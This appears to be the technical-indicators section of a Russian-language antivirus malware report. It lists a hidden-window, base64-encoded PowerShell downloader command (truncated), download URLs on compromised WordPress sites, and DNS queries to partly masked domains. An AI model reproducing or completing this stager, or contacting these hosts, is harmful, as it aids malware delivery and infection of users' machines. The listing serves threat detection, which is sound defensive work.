Техническая информация
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABkAEEAUQBRAHcAYwA9ACgAJwB3AEEAVQAnACsAJwAxAEEAQQAnACkAOwAkAEgANABVAEEAWgBBAD0ALgAoACcAbgBlAHcALQBvAGIAJwArACcAagBlACcAKwAnAGMAdAAnACkAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABYADQAQQBHAE...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1520
- %TEMP%\1368752.cvr
- 'pa#######lidingdoorrepair.com':80
- 'ih###tflix.com':80
- 'mq####thcare.com':443
- http://www.pa#######lidingdoorrepair.com/wp-admin/user/6C/
- http://ih###tflix.com/wp-content/2SP/
- 'mq####thcare.com':443
- DNS ASK pa#######lidingdoorrepair.com
- DNS ASK ih###tflix.com
- DNS ASK mq####thcare.com
- DNS ASK oy####nismanlik.net
- DNS ASK qc##sf.com
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABkAEEAUQBRAHcAYwA9ACgAJwB3AEEAVQAnACsAJwAxAEEAQQAnACkAOwAkAEgANABVAEEAWgBBAD0ALgAoACcAbgBlAHcALQBvAGIAJwArACcAagBlACcAKwAnAGMAdAAnACkAIABOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAJABYADQAQQBHAE...' (со скрытым окном)